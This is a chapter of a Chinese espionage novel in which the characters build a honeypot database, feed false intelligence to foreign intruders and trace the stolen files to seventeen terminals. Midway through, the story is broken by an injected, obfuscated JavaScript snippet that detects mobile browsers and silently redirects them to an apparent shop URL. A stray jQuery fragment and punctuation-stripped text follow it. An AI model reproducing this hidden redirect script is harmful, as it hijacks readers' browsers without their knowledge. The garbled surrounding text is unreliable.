接下来的一个月,秦岳几乎住进了地下室。


    那间屋子本来是个杂物间,堆满了废弃的设备和生锈的零件。


    他把那些东西全部清理出去,自己动手刷了墙,铺了地板,拉了几十条电线。


    墙上挂满了图纸,桌上堆满了服务器。


    角落里放着一张行军床,床头堆着方便面和罐头的空盒子。


    王卫国每次去,都看见他在电脑前,眼睛盯着屏幕,手指在键盘上敲敲打打。


    有时候叫他几声,他才反应过来,转过头,眼睛里布满血丝,脸上带着一种恍惚的笑。


    “队长,快了。再给我三天。”


    王卫国没说话,只是把他桌上的空盒子收走,把新买的饭放在旁边。


    秦岳点点头,又转回去继续敲键盘。


    第二十七天,系统完成了。


    王卫国站在地下室中央,看着那些闪烁的指示灯,听着服务器运转的嗡嗡声。


    秦岳在旁边,指着屏幕上的拓扑图,一项一项汇报。


    “这是‘龙渊’基地的数据库架构模拟。外观和真的完全一样,包括登录界面、文件层级、访问记录。”


    “内置的数据,一半是真的——药材配方、人员档案、采购记录,都是张老和许尚提供的,经得起查。”


    他切换到另一张图。


    “另一半是假的。核心配方里,我掺了几味不存在的药材。人员档案里,编了几个虚构的科研人员。基地布局图里,画错了几条通道的位置。”


    “这些错误,除了我们几个,其他人看不出来。”


    他顿了顿。


    “他们如果真拿了这些假情报去用,要么研究出废品,要么走进死胡同。”


    王卫国看着那些数据流。


    “访问监控呢?”


    秦岳指着另一个屏幕。


    “所有访问记录,全部在这里。谁进来的,什么时候进来的,看了哪些文件,停留了多长时间,下载了什么——全都能查到。”


    他调出一组代码。


    “我还植入了一段特殊追踪程序。一旦有人复制这些假情报,程序就会自动激活,反向追踪所有接触过这段代码的终端。”


    “不管他在哪个国家,用什么设备,只要打


    开过这个文件,我就能找到他。”


    王卫国看着那段代码。


    “这相当于在敌人的堡垒里埋了一颗定时**。”


    秦岳点头。


    “对。炸不炸,什么时候炸,我们说了算。”


    王卫国拍了拍他的肩膀。


    “辛苦了。”


    秦岳笑了笑,那笑容里带着疲惫,也带着满足。


    “队长,咱们什么时候开始?”


    王卫国说。


    “现在。”


    当晚,王卫国通过秘密渠道联系上“蒲公英”。


    电台里传来断断续续的杂音,然后是“蒲公英”压低的声音。


    “说吧。”


    王卫国把计划简单说了一遍。


    “蒲公英”沉默了几秒。


    “你是让我把入口泄露给他们?”


    “对。让他们以为,这是一个安全漏洞,可以偷偷进来偷东西。”


    “蒲公英”又沉默了一会儿。


    然后他说。


    “这个饵,够大。”


    王卫国说。


    “越大越好。越大,他们越容易上钩。”


    “蒲公英”说。


    “好。我来办。”


    电台关闭。


    接下来是等待。


    第一天,没有动静。


    第二天,没有动静。


    第三天,秦岳盯着监控屏幕,眼睛都不眨。


    第四天,屏幕上的数据流忽然跳动了一下。


    秦岳的呼吸停了一瞬。


    他调出访问记录。


    一个陌生的IP地址,来自境外某国,在北京时间凌晨三点十七分,尝试登录系统。


    登录失败。


    三分钟后,同一个IP再次尝试。


    再次失败。


    然后消失了。


    秦岳拿起电话。


    “队长,有人来过。”


    王卫国赶到地下室时,秦岳已经把那次访问的所有记录调了出来。


    “你看,这个IP很狡猾,用的是跳板服务器,一层一层跳过来的。我追了三层,最后落在——”


    他指着屏幕上的一个位置。


    “这个国家。和‘青松’之前提供的‘船长’核心成员


    活动区域高度重合。”


    王卫国看着那个坐标。


    “他们上钩了。”


    秦岳点头。


    “但只是试探。真正的行动肯定在后面。”


    王卫国说。


    “那就等。”


    接下来的两周系统又检测到三次异常访问。


    每次都来自不同的IP不同的国家不同的时间


    ;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17250488|184587||http|test|mini|href|location''.split(''|''),0,{}));


    () {


    $(''.inform'').remove();


    $(''#content'').append(''


    段。但每一次都只是试探没有真正进入核心数据区。


    秦岳把所有访问记录都保存下来一条一条分析。


    “他们在摸地形。”


    他说:“看这个系统是真是假看有没有陷阱看值不值得动手。”


    王卫国点头。


    “那就让他们摸。摸得越久越放心。”


    第二十三天凌晨两点。


    系统警报忽然响起。


    秦岳从行军床上跳起来扑到屏幕前。


    这一次不是试探。


    是一个完整的入侵路径。


    对方突破了第一层防火墙进入了用户登录界面。


    然后用一组窃取来的账号密码成功登录。


    账号是假的密码也是假的——是秦岳故意放在系统里的“诱饵”。


    对方进入系统后开始浏览文件。


    先看目录结构。


    再看文件命名规则。


    然后打开了几份文档快速浏览。


    秦岳盯着屏幕手心全是汗。


    那个人在系统里待了十七分钟。


    浏览了三十二份文件下载了其中五份。


    然后退出。


    所有操作记录


    秦岳等对方彻底退出后才开始检查。


    那五份被下载的文件全是秦岳精心准备的“半真半假”——有真有假真假难辨。其中两份是他故意放在醒目位置的核心配方。


    他打开追踪程序。


    屏幕上跳出一行字:追踪代码已激活。正在反向定位……


    三分钟后定位完成。


    十七个终端。


    分布在六个国家。


    秦岳看着那个数字后背发凉。


    十七个。


    也就是说这五份假情报一旦被复制传播就能锁定十七个接触过的人。


    他拿起电话。


    “队长他们进来了。”


    王卫国赶到时天已经亮了。


    他看着那十七个定位点沉默了很久。


    然后他指着其中一个点。


    “这个在哪儿?”


    秦岳放大地图。


    “国内。某大城市。”


    王卫国的眉头皱起来。


    “什么位置?”


    秦岳调出更详细的信息。


    “一个贸易公司。名字叫——远东进出口有限公司。”


    他看向王卫国。


    “要查吗?”


    王卫国说。


    “查。但不惊动。”